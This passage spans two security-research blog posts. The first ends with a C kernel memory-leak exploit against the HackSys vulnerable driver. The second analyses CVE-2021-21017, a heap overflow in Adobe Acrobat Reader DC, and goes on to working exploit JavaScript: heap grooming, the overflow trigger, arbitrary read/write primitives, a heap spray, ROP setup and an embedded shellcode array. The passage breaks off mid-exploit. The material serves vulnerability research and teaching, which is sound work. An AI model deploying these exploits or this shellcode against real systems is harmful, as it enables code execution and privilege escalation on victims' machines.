  // Array to manage handles opened by CreateEventA
  HANDLE eventObjects[5000];

  // Spray 5000 objects to fill the new page
  for (int i = 0; i < 5000; i++)
  {
    // Create the objects
    HANDLE tempHandle = CreateEventA(
      NULL,
      FALSE,
      FALSE,
      NULL
    );

    // Assign the handles to the array
    eventObjects[i] = tempHandle;
  }

  // Check to see if the first handle is a valid handle
  if (eventObjects[0] == NULL)
  {
    printf("[-] Error! Unable to spray CreateEventA objects! Error: 0x%lx\n", GetLastError());
    exit(-1);
  }
  else
  {
    printf("[+] Sprayed CreateEventA objects to fill holes of size 0x80!\n");

    // Close half of the handles
    for (int i = 0; i < 5000; i += 2)
    {
      BOOL tempHandle1 = CloseHandle(
        eventObjects[i]
      );

      eventObjects[i] = NULL;

      // Error handling
      if (!tempHandle1)
      {
        printf("[-] Error! Unable to free the CreateEventA objects! Error: 0x%lx\n", GetLastError());
        exit(-1);
      }
    }

    printf("[+] Poked holes in the new pool page!\n");

    // Allocate UaF Objects in place of the poked holes by just invoking the IOCTL, which will call ExAllocatePoolWithTag for a UAF object
    // kLFH should automatically fill the freed holes with the UAF objects
    DWORD bytesReturned;

    for (int i = 0; i < 2500; i++)
    {
      DeviceIoControl(
        driverHandle,
        0x00222053,
        NULL,
        0,
        NULL,
        0,
        &bytesReturned,
        NULL
      );
    }

    printf("[+] Allocated objects containing a pointer to HEVD in place of the freed CreateEventA objects!\n");

    // Close the rest of the event objects
    for (int i = 1; i <= 5000; i += 2)
    {
      BOOL tempHandle2 = CloseHandle(
        eventObjects[i]
      );

      eventObjects[i] = NULL;

      // Error handling
      if (!tempHandle2)
      {
        printf("[-] Error! Unable to free the rest of the CreateEventA objects! Error: 0x%lx\n", GetLastError());
        exit(-1);
      }
    }

    // Array to store the buffer (output buffer for DeviceIoControl) and the base address
    unsigned long long outputBuffer[100];
    unsigned long long hevdBase;

    // Everything is now, theoretically, [FREE, UAFOBJ, FREE, UAFOBJ, FREE, UAFOBJ], barring any more randomization from the kLFH
    // Fill some of the holes, but not all, with vulnerable chunks that can read out-of-bounds (we don't want to fill up all the way to avoid reading from a page that isn't mapped)

    for (int i = 0; i < 100; i++)
    {
      // Return buffer
      DWORD bytesReturned1;

      DeviceIoControl(
        driverHandle,
        0x0022204f,
        NULL,
        0,
        &outputBuffer,
        sizeof(outputBuffer),
        &bytesReturned1,
        NULL
      );

    }

    printf("[+] Successfully triggered the out-of-bounds read!\n");

    // Parse the output
    for (int i = 0; i < 100; i++)
    {
      // Kernel mode address?
      if ((outputBuffer[i] & 0xfffff00000000000) == 0xfffff00000000000)
      {
        printf("[+] Address of function pointer in HEVD.sys: 0x%llx\n", outputBuffer[i]);
        printf("[+] Base address of HEVD.sys: 0x%llx\n", outputBuffer[i] - 0x880CC);

        // Store the variable for future usage
        hevdBase = outputBuffer[i] - 0x880CC;
        break;
      }
    }
  }
}

void main(void)
{
  // Open a handle to the driver
  printf("[+] Obtaining handle to HEVD.sys...\n");

  HANDLE drvHandle = CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver",
    GENERIC_READ | GENERIC_WRITE,
    0x0,
    NULL,
    OPEN_EXISTING,
    0x0,
    NULL
  );

  // Error handling
  if (drvHandle == (HANDLE)-1)
  {
    printf("[-] Error! Unable to open a handle to the driver. Error: 0x%lx\n", GetLastError());
    exit(-1);
  }
  else
  {
    memLeak(drvHandle);
  }
}

Conclusion

Kernel exploits from browsers, which are sandboxed, require such leaks to perform successful escalation of privileges. In part two of this series we will combine this bug with HEVD’s pool overflow vulnerability to achieve a read/write primitive and perform successful EoP! Please feel free to reach out with comments, questions, or corrections!

Peace, love, and positivity :-)

Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC

By Sergi Martinez

This post analyzes and exploits CVE-2021-21017, a heap buffer overflow reported in Adobe Acrobat Reader DC prior to version 2021.001.20135. This vulnerability was anonymously reported to Adobe and patched on February 9th, 2021. A publicly posted proof-of-concept containing root-cause analysis was used as a starting point for this research.

This post is similar to our previous post on Adobe Acrobat Reader, which exploits a use-after-free vulnerability that also occurs while processing Unicode and ANSI strings.

Overview

A heap buffer overflow occurs in the concatenation of an ANSI-encoded string corresponding to a PDF document’s base URL. This occurs when an embedded JavaScript script calls functions located in the IA32.api module, which deals with internet access, such as this.submitForm and app.launchURL. When these functions are called with a relative URL whose encoding differs from that of the PDF’s base URL, the relative URL is treated as if it has the same encoding as the PDF’s path. This can result in copying twice the number of bytes of the source ANSI string (the relative URL) into a properly sized destination buffer, leading to both an out-of-bounds read and a heap buffer overflow.

CVE-2021-21017

Acrobat Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

Internet access related operations are handled by the IA32.api module. The vulnerability occurs within this module when a URL is built by concatenating the PDF document’s base URL and a relative URL. This relative URL is specified as a parameter in a call to JavaScript functions that trigger any kind of Internet access such as this.submitForm and app.launchURL. In particular, the vulnerability occurs when the encoding of both strings differ.

The concatenation of both strings is done by allocating enough memory to fit the final string. The computation of the length of both strings is correctly done taking into account whether they are ANSI or Unicode. However, when the concatenation occurs only the base URL encoding is checked and the relative URL is considered to have the same encoding as the base URL. When the relative URL is ANSI encoded, the code that copies bytes from the relative URL string buffer into the allocated buffer copies it two bytes at a time instead of just one byte at a time. This leads to reading a number of bytes equal to the length of the relative URL from outside the source buffer and copying it beyond the bounds of the destination buffer by the same length, resulting in both an out-of-bounds read and an out-of-bounds write vulnerability.
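
Conceptually, the flawed copy behaves like the following sketch. This is illustrative only, not the actual IA32.api code shown later; relativeUrl stands for the ANSI relative URL of length lenA bytes, and dest was sized assuming only lenA more bytes would be appended at offset outPos:

// Conceptual sketch of the bug - not the decompiled IA32.api logic below
for (size_t i = 0; i < lenA; i++)
{
    // The copy assumes the base URL's (Unicode) encoding and therefore moves
    // two bytes per "character" of the ANSI relative URL:
    dest[outPos++] = relativeUrl[2 * i];        // eventually reads past the end of relativeUrl
    dest[outPos++] = relativeUrl[2 * i + 1];    // and the writes run past the end of dest
}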

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference marks denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

All code listings show decompiled C code; source code is not available in the affected product. Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

The following function is called when a relative URL needs to be concatenated to a base URL. Aside from the concatenation it also checks that both URLs are valid.

__int16 __cdecl sub_25817D70(wchar_t *Source, CHAR *lpString, char *String, _DWORD *a4, int *a5)
{
  __int16 v5; // di
  CHAR v6; // cl
  CHAR *v7; // ecx
  CHAR v8; // al
  CHAR v9; // dl
  CHAR *v10; // eax
  bool v11; // zf
  CHAR *v12; // eax

[Truncated]

  int iMaxLength; // [esp+D4h] [ebp-14h]
  LPCSTR v65; // [esp+D8h] [ebp-10h]
  int v66; // [esp+DCh] [ebp-Ch] BYREF
  LPCSTR v67; // [esp+E0h] [ebp-8h]
  wchar_t *v68; // [esp+E4h] [ebp-4h]

  v68 = 0;
  v65 = 0;
  v67 = 0;
  v38 = 0;
  v51 = 0;
  v63 = 0;
  v5 = 1;
  if ( !a5 )
    return 0;
  *a5 = 0;
  if ( lpString )
  {
    if ( *lpString )
    {
      v6 = lpString[1];
      if ( v6 )
      {

[1]

        if ( *lpString == (CHAR)0xFE && v6 == (CHAR)0xFF )
        {
          v7 = lpString;
          while ( 1 )
          {
            v8 = *v7;
            v9 = v7[1];
            v7 += 2;
            if ( !v8 )
              break;
            if ( !v9 || !v7 )
              goto LABEL_14;
          }
          if ( !v9 )
            goto LABEL_15;

[2]

LABEL_14:
          *a5 = -2;
          return 0;
        }
      }
    }
  }
LABEL_15:
  if ( !Source || !lpString || !String || !a4 )
  {
    *a5 = -2;
    goto LABEL_79;
  }

[3]

  iMaxLength = sub_25802A44((LPCSTR)Source) + 1;
  v10 = (CHAR *)sub_25802CD5(1, iMaxLength);
  v65 = v10;
  if ( !v10 )
  {
    *a5 = -7;
    return 0;
  }

[4]

  sub_25802D98((wchar_t *)v10, Source, iMaxLength);
  if ( *lpString != (CHAR)0xFE || (v11 = lpString[1] == -1, v67 = (LPCSTR)2, !v11) )
    v67 = (LPCSTR)1;

[5]

  v66 = (int)&v67[sub_25802A44(lpString)];
  v12 = (CHAR *)sub_25802CD5(1, v66);
  v67 = v12;
  if ( !v12 )
  {
    *a5 = -7;
LABEL_79:
    v5 = 0;
    goto LABEL_80;
  }

[6]

  sub_25802D98((wchar_t *)v12, (wchar_t *)lpString, v66);
  if ( !(unsigned __int16)sub_258033CD(v65, iMaxLength, a5) || !(unsigned __int16)sub_258033CD(v67, v66, a5) )
    goto LABEL_79;

[7]

  v13 = sub_25802400(v65, v31);
  if ( v13 || (v13 = sub_25802400(v67, v39)) != 0 )
  {
    *a5 = v13;
    goto LABEL_79;
  }

[Truncated]

[8]

  v23 = (wchar_t *)sub_25802CD5(1, v47 + 1 + v35);
  v68 = v23;
  if ( v23 )
  {
    if ( v35 )
    {

[9]

      sub_25802D98(v23, v36, v35 + 1);
      if ( *((_BYTE *)v23 + v35 - 1) != 47 )
      {
        v25 = sub_25818CE4(v24, (char *)v23, 47);
        if ( v25 )
          *(_BYTE *)(v25 + 1) = 0;
        else
          *(_BYTE *)v23 = 0;
      }
    }
    if ( v47 )
    {

[10]

      v26 = sub_25802A44((LPCSTR)v23);
      sub_25818BE0((char *)v23, v48, v47 + 1 + v26);
    }
    sub_25802E0C(v23, 0);
    v60 = sub_25802A44((LPCSTR)v23);
    v61 = v23;
    goto LABEL_69;
  }
  v5 = 0;
  *a4 = v47 + v35 + 1;
  *a5 = -3;
LABEL_81:
  if ( v65 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v65);
  if ( v67 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v67);
  if ( v23 )
    (*(void (__cdecl **)(wchar_t *))(dword_25824088 + 12))(v23);
  return v5;
}

The function listed above receives as parameters a string corresponding to a base URL and a string corresponding to a relative URL, as well as two pointers used to return data to the caller. The two string parameters are shown in the following debugger output.

IA32!PlugInMain+0x168b0:
605a7d70 55              push    ebp
0:000> dd poi(esp+4) L84
099a35f0  0068fffe 00740074 00730070 002f003a
099a3600  0067002f 006f006f 006c0067 002e0065
099a3610  006f0063 002f006d 41414141 41414141
099a3620  41414141 41414141 41414141 41414141
099a3630  41414141 41414141 41414141 41414141

[Truncated]

099a37c0  41414141 41414141 41414141 41414141
099a37d0  41414141 41414141 41414141 41414141
099a37e0  41414141 41414141 41414141 2f2f3a41
099a37f0  00000000 00680074 00730069 006f002e
0:000> du poi(esp+4)
099a35f0  ".https://google.com/䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3630  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3670  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36f0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3730  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3770  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a37b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁㩁."
099a37f0  ""
0:000> dd poi(esp+8)
0b2d30b0  61616262 61616161 61616161 61616161
0b2d30c0  61616161 61616161 61616161 61616161
0b2d30d0  61616161 61616161 61616161 61616161
0b2d30e0  61616161 61616161 61616161 61616161

[Truncated]

0b2d5480  61616161 61616161 61616161 61616161
0b2d5490  61616161 61616161 61616161 61616161
0b2d54a0  61616161 61616161 61616161 00616161
0b2d54b0  4d21fcdc 80000900 41409090 ffff4041
0:000> da poi(esp+8)
0b2d30b0  "bbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30d0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30f0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d3110  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

[Truncated]

0b2d5430  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5450  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5470  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5490  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The debugger output shown above corresponds to an execution of the exploit. It shows the contents of the first and second parameters (esp+4 and esp+8) of the function sub_25817D70. The first parameter contains a Unicode-encoded base URL https://google.com/ (notice the 0xfeff bytes at the start of the string), while the second parameter contains an ASCII string corresponding to the relative URL. Both contain a number of repeated bytes that serve as padding to control the allocation size needed to hold them, which is useful for exploitation.

At [1] a check is made to ascertain whether the second parameter is a valid Unicode string. If an anomaly is found the function returns at [2]. The function sub_25802A44 at [3] computes the length of the string provided as a parameter, regardless of its encoding. The function sub_25802CD5 is an implementation of calloc which allocates an array with the number of elements provided as the first parameter, each with the size specified as the second parameter. The function sub_25802D98 at [4] copies a number of bytes of the string specified in the second parameter to the buffer pointed to by the first parameter. Its third parameter specifies the number of bytes to be copied. Therefore, at [3] and [4] the length of the base URL is computed, a new allocation of that size plus one is performed, and the base URL string is copied into the new allocation. In an analogous manner, the same operations are performed on the relative URL at [5] and [6].

The function sub_25802400, called at [7], receives a URL or a part of it and performs some validation and processing. This function is called on both base and relative URLs.

At [8] an allocation of the size required to host the concatenation of the relative URL and the base URL is performed. The lengths provided are calculated in the function called at [7]. For the sake of simplicity it is illustrated with an example: the following debugger output shows the value of the parameters to sub_25802CD5 that correspond to the number of elements to be allocated, and the size of each element. In this case the size is the addition of the length of the base and relative URLs.

eax=00002600 ebx=00000000 ecx=00002400 edx=00000000 esi=010fd228 edi=00000001
eip=61912cd5 esp=010fd0e4 ebp=010fd1dc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
IA32!PlugInMain+0x1815:
61912cd5 55              push    ebp
0:000> dd esp+4 L1
010fd0e8  00000001
0:000> dd esp+8 L1
010fd0ec  00002600

Continuing with the function previously listed, at [9] the base URL is copied into the memory allocated to host the concatenation and at [10] its length is calculated and provided as a parameter to the call to sub_25818BE0. This function implements string concatenation for both Unicode and ANSI strings. The call to this function at [10] provides the base URL as the first parameter, the relative URL as the second parameter and the expected full size of the concatenation as the third. This function is listed below.

int __cdecl sub_25818BE0(char *Destination, char *Source, int a3)
{
  int result; // eax
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !Destination || !Source || !a3 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[11]

  pExceptionObject = sub_25802A44(Destination);
  if ( pExceptionObject + sub_25802A44(Source) <= (unsigned int)(a3 - 1) )
  {

[12]

    sub_2581894C(Destination, Source);
    result = 1;
  }
  else
  {

[13]

    strncat(Destination, Source, a3 - pExceptionObject - 1);
    result = 0;
    Destination[a3 - 1] = 0;
  }
  return result;
}

In the above listing, at [11] the length of the destination string is calculated. It then checks if the length of the destination string plus the length of the source string is less than or equal to the desired concatenation length minus one. If the check passes, the function sub_2581894C is called at [12]. Otherwise the strncat function at [13] is called.

The function sub_2581894C called at [12] implements the actual string concatenation that works for both Unicode and ANSI strings.

LPSTR __cdecl sub_2581894C(LPSTR lpString1, LPCSTR lpString2)
{
  int v3; // eax
  LPCSTR v4; // edx
  CHAR *v5; // ecx
  CHAR v6; // al
  CHAR v7; // bl
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !lpString1 || !lpString2 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[14]

  if ( *lpString1 == (CHAR)0xFE && lpString1[1] == (CHAR)0xFF )
  {

[15]

    v3 = sub_25802A44(lpString1);
    v4 = lpString2 + 2;
    v5 = &lpString1[v3];
    do
    {
      do
      {
        v6 = *v4;
        v4 += 2;
        *v5 = v6;
        v5 += 2;
        v7 = *(v4 - 1);
        *(v5 - 1) = v7;
      }
      while ( v6 );
    }
    while ( v7 );
  }
  else
  {

[16]

    lstrcatA(lpString1, lpString2);
  }
  return lpString1;
}

In the function listed above, at [14] the first parameter (the destination) is checked for the Unicode BOM marker 0xFEFF. If the destination string is Unicode the code proceeds to [15]. There, the source string is appended at the end of the destination string two bytes at a time. If the destination string is ANSI, then the known lstrcatA function is called.

It becomes clear that in the event that the destination string is Unicode and the source string is ANSI, for each character of the ANSI string two bytes are actually copied. This causes an out-of-bounds read of the size of the ANSI string that becomes a heap buffer overflow of the same size once the bytes are copied.

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution. 

Adobe Acrobat Reader DC version 2020.013.20074 running on Windows 10 x64 was used to develop the exploit. Note that Adobe Acrobat Reader DC is a 32-bit application. A successful exploit strategy needs to bypass the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)
  • Sandbox Bypass

The exploit does not bypass the following protection mechanisms:

  • Adobe Sandbox protection: Sandbox protection must be disabled in Adobe Reader for this exploit to work. This may be done from the Adobe Reader user interface by unchecking the Enable Protected Mode at Startup option found under Preferences -> Security (Enhanced).
  • Control Flow Guard (CFG): CFG must be disabled on the Windows machine for this exploit to work. This may be done from the Exploit Protection settings of Windows 10, setting the Control Flow Guard (CFG) option to Off by default.

In order to exploit this vulnerability bypassing ASLR and DEP, the following strategy is adopted:

  1. Prepare the heap layout to allow controlling the memory areas adjacent to the allocations made for the base URL and the relative URL. This involves performing enough allocations to activate the Low Fragmentation Heap bucket for the two sizes, and enough allocations to entirely fit a UserBlock. The allocations with the same size as the base URL allocation must contain an ArrayBuffer object, while the allocations with the same size as the relative URL must have the data required to overwrite the byteLength field of one of those ArrayBuffer objects with the value 0xffff.
  2. Poke some holes on the UserBlock by nullifying the reference to some of the recently allocated memory chunks.
  3. Trigger the garbage collector to free the memory chunks referenced by the nullified objects. This provides room for the base URL and relative URL allocations.
  4. Trigger the heap buffer overflow vulnerability, so the data in the memory chunk adjacent to the relative URL will be copied to the memory chunk adjacent to the base URL.
  5. If everything worked, step 4 should have overwritten the byteLength of one of the controlled ArrayBuffer objects. When a DataView object is created on the corrupted ArrayBuffer it is possible to read and write memory beyond the underlying allocation. This provides a precise way of overwriting the byteLength of the next ArrayBuffer with the value 0xffffffff. Creating a DataView object on this last ArrayBuffer allows reading and writing memory arbitrarily, but relative to where the ArrayBuffer is.
  6. Using the R/W primitive built, walk the NT Heap structure to identify the BusyBitmap.Buffer pointer. This allows knowing the absolute address of the corrupted ArrayBuffer and building an arbitrary read and write primitive that allows reading from and writing to absolute addresses.
  7. To bypass DEP it is required to pivot the stack to a controlled memory area. This is done by using a ROP gadget that writes a fixed value to the ESP register.
  8. Spray the heap with ArrayBuffer objects of the correct size so they are adjacent to each other. This should place a controlled allocation at the address pointed to by the stack-pivoting ROP gadget.
  9. Use the arbitrary read and write to write shellcode in a controlled memory area, and to write the ROP chain to execute VirtualProtect to enable execution permissions on the memory area where the shellcode was written.
  10. Overwrite a function pointer of the DataView object used in the read and write primitive and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Preparing the Heap Layout

The size of the strings involved in this vulnerability can be controlled. This is convenient since it allows selecting the right size for each of them so they are handled by the Low Fragmentation Heap. The inner workings of the Low Fragmentation Heap (LFH) can be leveraged to increase the determinism of the memory layout required to exploit this vulnerability. Selecting a size that is not used in the program allows full control to activate the LFH bucket corresponding to it, and perform the exact number of allocations required to fit one UserBlock.

The memory chunks within a UserBlock are returned to the user randomly when an allocation is performed. The ideal layout required to exploit this vulnerability is having free chunks adjacent to controlled chunks, so when the strings required to trigger the vulnerability are allocated they fall in one of those free chunks.

In order to set up such a layout, 0xd+0x11 ArrayBuffers of size 0x2608-0x10-0x8 are allocated. The first 0x11 allocations are used to enable the LFH bucket, and the next 0xd allocations are used to fill a UserBlock (note that the number of chunks in the first UserBlock for that bucket size is not always 0xd, so this technique is not 100% effective). The ArrayBuffer size is selected so the underlying allocation is of size 0x2608 (including the chunk metadata), which corresponds to an LFH bucket not used by the application.

Then, the same procedure is done but allocating strings whose underlying allocation size is 0x2408, instead of allocating ArrayBuffers. The number of allocations to fit a UserBlock for this size can be 0xe.

The strings should contain the bytes required to overwrite the byteLength property of the ArrayBuffer that is corrupted once the vulnerability is triggered. The value that will overwrite the byteLength property is 0xffff. This does not allow leveraging the ArrayBuffer to read and write to the whole range of memory addresses in the process. Also, it is not possible to directly overwrite the byteLength with the value 0xffffffff since it would require overwriting the pointer of its DataView object with a non-zero value, which would corrupt it and break its functionality. Instead, writing only 0xffff allows avoiding overwriting the DataView object pointer, keeping its functionality intact since the leftmost two null bytes would be considered the Unicode string terminator during the concatenation operation.

function massageHeap() {

[1]

    var arrayBuffers = new Array(0xd+0x11);
    for (var i = 0; i < arrayBuffers.length; i++) {
        arrayBuffers[i] = new ArrayBuffer(0x2608-0x10-0x8);
        var dv = new DataView(arrayBuffers[i]);
    }

[2]

    var holeDistance = (arrayBuffers.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= arrayBuffers.length; i += holeDistance) {
        arrayBuffers[i] = null;
    }


[3]

    var strings = new Array(0xe+0x11);
    var str = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%0000%u0000') + unescape('%u9090%u9090').repeat(0x2408);
    for (var i = 0; i < strings.length; i++) {
        strings[i] = str.substring(0, (0x2408-0x8)/2 - 2).toUpperCase();
    }


[4]

    var holeDistance = (strings.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= strings.length; i += holeDistance) {
        strings[i] = null;
    }

    return arrayBuffers;
}

In the listing above, the ArrayBuffer allocations are created in [1]. Then in [2] two pointers to the created allocations are nullified in order to attempt to create free chunks surrounded by controlled chunks.

At [3] and [4] the same steps are done with the allocated strings.

Triggering the Vulnerability

Triggering the vulnerability is as easy as calling the app.launchURL JavaScript function. Internally, the relative URL provided as a parameter is concatenated to the base URL defined in the PDF document catalog, thus executing the vulnerable function explained in the Code Analysis section of this document.

function triggerHeapOverflow() {
    try {
        app.launchURL('bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 -0x8));
    } catch(err) {}
}

The size of the allocation holding the relative URL string must be the same as the one used when preparing the heap layout, so that it occupies one of the freed spots, ideally with a controlled allocation adjacent to it.

Obtaining an Arbitrary Read / Write Primitive

When the proper heap layout is successfully achieved and the vulnerability has been triggered, an ArrayBuffer byteLength property would be corrupted with the value 0xffff. This allows writing past the boundaries of the underlying memory allocation and overwriting the byteLength property of the next ArrayBuffer. Finally, creating a DataView object on this last corrupted buffer allows reading from and writing to the whole memory address range of the process in a relative manner.

In order to be able to read from and write to absolute addresses, the memory address of the corrupted ArrayBuffer must be obtained. One way of doing it is to leverage the NT Heap metadata structures to leak a pointer to the same structure. It is relevant that the chunk header contains the chunk number and that all the chunks in a UserBlock are consecutive and adjacent. In addition, the size of the chunks is known, so it is possible to compute the distance from the origin of the relative read and write primitive to the pointer to leak. In an analogous manner, since the distance is known, once the pointer is leaked the distance can be subtracted from it to obtain the address of the origin of the read and write primitive.

The following function implements the process described in this subsection.

function getArbitraryRW(arrayBuffers) {

[1]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == 0xffff) {
            var dv = new DataView(arrayBuffers[i]);
            dv.setUint32(0x25f0+0xc, 0xffffffff, true);
        }
    }

[2]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == -1) {
            var rw = new DataView(arrayBuffers[i]);
            corruptedBuffer = arrayBuffers[i];
        }
    }

[3]

    if (rw) {
        var chunkNumber = rw.getUint8(0xffffffff+0x1-0x13, true);
        var chunkSize = 0x25f0+0x10+8;

        var distanceToBitmapBuffer = (chunkSize * chunkNumber) + 0x18 + 8;
        var bitmapBufferPtr = rw.getUint32(0xffffffff+0x1-distanceToBitmapBuffer, true);

        startAddr = bitmapBufferPtr + distanceToBitmapBuffer-4;
        return rw;
    }
    return rw;
}

The function above at [1] tries to locate the initial corrupted ArrayBuffer and leverages it to corrupt the adjacent ArrayBuffer. At [2] it tries to locate the recently corrupted ArrayBuffer and build the relative arbitrary read and write primitive by creating a DataView object on it. Finally, at [3] the aforementioned method of obtaining the absolute address of the origin of the relative read and write primitive is implemented.

Once the origin address of the read and write primitive is known it is possible to use the following helper functions to read and write to any address of the process that has mapped memory.

function readUint32(dataView, absoluteAddress) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}

Spraying ArrayBuffer Objects

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get heap allocations of the right size, the metadata of ArrayBuffer objects and heap chunks has to be taken into consideration. The internal representation of ArrayBuffer objects shows that the size of their metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

function sprayHeap() {
    var heapSegmentSize = 0x10000;

[1]

    heapSpray = new Array(0x8000);
    for (var i = 0; i < 0x8000; i++) {
        heapSpray[i] = new ArrayBuffer(heapSegmentSize-0x10-0x8);
        var tmpDv = new DataView(heapSpray[i]);
        tmpDv.setUint32(0, 0xdeadbabe, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the stack pivot ROP gadget used.

The purpose of these allocations is to have a controllable memory region at the address where the stack is relocated after the execution of the stack pivot. This area can be used to prepare the call to VirtualProtect to enable execution permissions on the memory page where the shellcode is written.

Hijacking the Execution Flow and Executing Arbitrary Code

With the ability to arbitrarily read and write memory, the next steps are preparing the shellcode, writing it, and executing it. The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allow  execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following functions are used in the implementation of the mentioned strategy.

[1]

function getAddressLeaks(rw) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var escriptAddrDelta = 0x275518;
    var escriptAddr = readUint32(rw, dataViewObjPtr+0xc) - escriptAddrDelta;

    var kernel32BaseDelta = 0x273eb8;
    var kernel32Addr = readUint32(rw, escriptAddr + kernel32BaseDelta);

    return [escriptAddr, kernel32Addr];
}
 
[2]

function prepareNewStack(kernel32Addr) {

    var virtualProtectStubDelta = 0x20420;
    writeUint32(rw, newStackAddr, kernel32Addr + virtualProtectStubDelta);

    var shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x6578652e,
        0x00000000]


[3]

    var shellcode_size = shellcode.length * 4;
